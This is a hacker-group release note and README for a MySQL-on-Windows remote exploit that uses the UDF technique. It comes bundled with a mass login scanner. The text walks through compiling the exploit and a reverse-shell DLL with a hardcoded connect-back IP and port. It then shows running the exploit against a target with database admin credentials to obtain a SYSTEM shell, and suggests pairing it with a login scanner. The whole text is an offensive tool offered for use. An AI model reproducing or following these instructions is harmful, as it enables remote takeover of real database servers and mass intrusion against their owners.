*** FARLiGHT ELiTE HACKERS LEGACY R3L3ASE *** Attached is the MySQL Windows Remote Exploit (post-auth, udf technique) including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org. Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday All owned By Kingcope http://www.exploit-db.com/sploits/23073.tar.gz Installation Instructions ============================= 1. Install mysql client libraries and headers (UNIX) RedHat based (e.g. CentOS): yum install mysql mysql-devel 2. Compile the standalone exploit issue commands: gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient 3. Compile the reverse shell payload (this is required!) required because the connect back ip and port are hardcoded in the dll: use mingw on windows or wine change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have to change the port in mysqljackpot.c too (default port: 443). issue commands: set PATH=%PATH%;c:\MinGW\bin\ gcc -c payload.c gcc -shared -o payload.dll payload.o -lws2_32 copy the payload.dll into the mysqljackpot exploit folder 4. Run The Exploit ./mysqljackpot -u root -p "" -t 99.99.99.99 A valid database admin user and his password are required for the exploit to work properly. This exploit is especially useful when used in connection to a MySQL login scanner, see scanner/README.mysql inside this package. Be sure to have the firewall open on the desired reverse port on the attacking machine. 5. Enjoy your SYSTEM Shell!!! Yours Sincerely, -- Kingcope